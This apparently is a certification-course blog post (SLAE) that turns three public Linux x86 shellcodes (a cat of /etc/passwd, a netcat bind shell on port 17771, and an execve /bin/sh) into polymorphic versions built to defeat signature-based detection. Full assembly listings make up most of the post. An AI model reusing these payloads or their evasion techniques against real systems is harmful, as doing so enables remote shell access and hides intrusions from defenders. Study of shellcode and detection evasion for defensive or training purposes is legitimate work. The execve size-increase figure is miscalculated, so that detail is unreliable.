Polymorphic shellcodes help defeat pattern matching. A great shellcode will combine not only the polymorphism in the shellcode but will combine a variety of techniques including encoding, encryption, and polymorphism. In this post, we will take up 3 different shellcodes and will convert them into the polymorphic ones. A polymorphic shellcode will not differ in the functionality, but we will use a variety of other instructions. This means that polymorphism is nothing but doing the same thing using a variety of different instructions.

/bin/cat /etc/passwd Shellcode 

The first payload we will be using is from http://shell-storm.org/shellcode/files/shellcode-571.php . This shellcode is a simple /bin/cat shellcode and will display the contents of /etc/passwd file. The code is as follows:

; Polymorphic Version of /bin/cat Shellcode from http://shell-storm.org/shellcode/files/shellcode-571.php
; Author: Nipun Jaswal

global _start
section .text

;   xor eax,eax
    xor ecx,ecx				; Clearing out ECX

;   cdq
    mul ecx				    ; Clearing EAX

;   push edx
    push eax
;   mov dword [esp-4], ecx	; Moving ECX to the TOP of the Stack
;   sub esp,4				; Stack Adjustment

    mov esi, 0x523e3f0a		; Actual Value - 22232425
    add esi, 0x22232425		; Adding the Value
    push esi				; Push Operation
;   push dword 0x7461632f

    inc esi				    ; Avoiding Null Byte
    sub esi, 0x05f80101		; Adjusting Second Value
    push esi				; Push Operation
;   push dword 0x6e69622f
    mov ebx, esp

    push ecx
    sub esi, 0x09f1eebc		; Re-Using ESI, Beating Pattern Matching
    push esi
;   push  0x64777373

    sub esi, 0x03074444		; Re-Using ESI, Beating Pattern Matching
    push esi
;   push 0x61702f2f

    add esi, 0x02043601		; Re-Using ESI, Beating Pattern Matching
    dec esi				    ; Avoiding Null Byte
    push esi
;   push 0x6374652f
					        ; Unchanged Section
    mov ecx, esp
    mov al, 0xb
    push edx
    push ecx
    push ebx
    mov ecx,esp
    int 0x80

We have commented out instructions from the original code and replaced it with a different set of instructions. We made use of ESI register instead of pushing the string directly onto the stack and performed an ADD operation to get the same value which was pushed in the original shellcode. To avoid null values we incremented ESI and performed subtract operation to get the second same value being pushed in the original shellcode.

Throughout the shellcode, we made use of ADD, SUB, INC & DEC instructions to completely defeat pattern matching. On compiling and Running the code, we get the following output:

Original Payload Length: 43 Bytes Polymorphic Version Length: 61 Bytes Change %age : 41% Increase

Netcat Bind TCP Shellcode

The next shellcode is a netcat bind TCP shellcode which allows you to connect to the port 17771 and presents a system shell. The original Shellcode can be downloaded from  http://shell-storm.org/shellcode/files/shellcode-872.php and is 58 bytes in length. Using the similar approach we took for the previous shellcode, let see what a polymorphic version of the shellcode looks like:

; http://shell-storm.org/shellcode/files/shellcode-872.php
; Author: Nipun Jaswal (SLAE-1080)
global _start
section .text
;   xor eax, eax
    xor edx, edx	; Cleared EDX
    mul edx		; Cleared EAX

;   push eax
    push edx		; EDX is Also Zero

    mov esi, 0x30363636	; Instead of PUSH moved a Value to ESI
    add esi, 0x01010101 ; Addition Operation to Get the Same Value i.e. 0x31373737
    push esi		; Push Op
    add esi, 0x21010101 ; Adding Random Value to ESI (Avoiding Null)
    sub esi, 0x20c7c20b ; Getting Back the Same Value i.e. 0x3170762d
    push esi		; Push Op
;   push 0x31373737
;   push 0x3170762d
    mov esi, esp	; Moving ESP to ESI

;   push eax
    push edx		; EDX is also Zero

    mov edi, 0x68732f30	; Incremented Value to EDI
    dec edi		; Decrement the Value
    push edi		; Push EDI
    inc edi		; Incremented Again( Avoiding Null Byte)
    add edi, 0x05F632FF	; Same as 0x6e69622f (Adjusting the Value For Next Push)
    push edi 		; Value Pushed
;   push 0x68732f2f     ;-le//bin//sh
;   push 0x6e69622f
    push 0x2f656c2d	; -le/ remains unmasked
    mov edi, esp

;   push eax
    push edx		; EDX is same as EAX
    mov edx,0x636e2f2e	; Decremented Value of EDX
    inc edx		; Increment EDX
    push edx		; Push EDX
;   push 0x636e2f2f     ;/bin//nc

    dec edx		; Back to the Original Value for Null Free OP
    add edx, 0xafb3301	; Add Value to EDX
    push edx
;   push 0x6e69622f

    mov ebx, esp
    xor edx,edx		; Since we Used EDX above, Zeroing it Out Here
    push eax
    push esi
    push edi
    push ebx
    mov ecx, esp
;   mov al,11
    mov al,12		; Incremented
    dec eax		; Decrement
    int 0x80

The code is pretty straightforward. However, we only replace instructions which are relevant to the signatures. We made use of ESI again as we did in the previous shellcode. However, we are also making use of EDI register as well.  On executing the shellcode:

Original Payload Length: 58 Bytes Polymorphic Version Length: 86 Bytes Change %age : 48% Increase

Execve Shellcode

The last shellcode is execve shellcode from http://shell-storm.org/shellcode/files/shellcode-575.php and is 21 bytes in length. The shellcode does nothing much than popping up a shell locally. Let’s make a polymorphic version of it as follows:

;Author: Nipun Jaswal (SLAE-1080)
global _start
section .text

	xchg esi, eax	; Zero to EAX
	mov al, 0xb	; Mov Instead of PUSH
	;push byte +0xb
	;pop eax
	push ecx	; ECX is also Zero
	;push edx
	;push dword 0x68732f2f
	mov esi, 0x68732f2f	; Value Moved to ESI
	push esi		; Pushed onto the Stack
	dec esi			; Value Decremented to Avoid NULL
	add esi, 0x5F63301	; Added Value to Match Second Parameter
	push esi		; Value Pushed
	;push dword 0x6e69622f
	mov ebx, esp		; Paramters to EBX
	;xor ecx, ecx
	int 0x80		; Interrupt

We used the same concepts like we did for the previous shellcodes. Original Payload Length: 21 Bytes Polymorphic Version Length: 22 Bytes Change %age : 0.4% Increase On running the shellcode, we get the following output:

Throughout this post, we saw that how a single operation can be done through a countless number of ways and making use of different instructions. In the next post, we will see how we can make our own crypter.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student-ID: SLAE-1080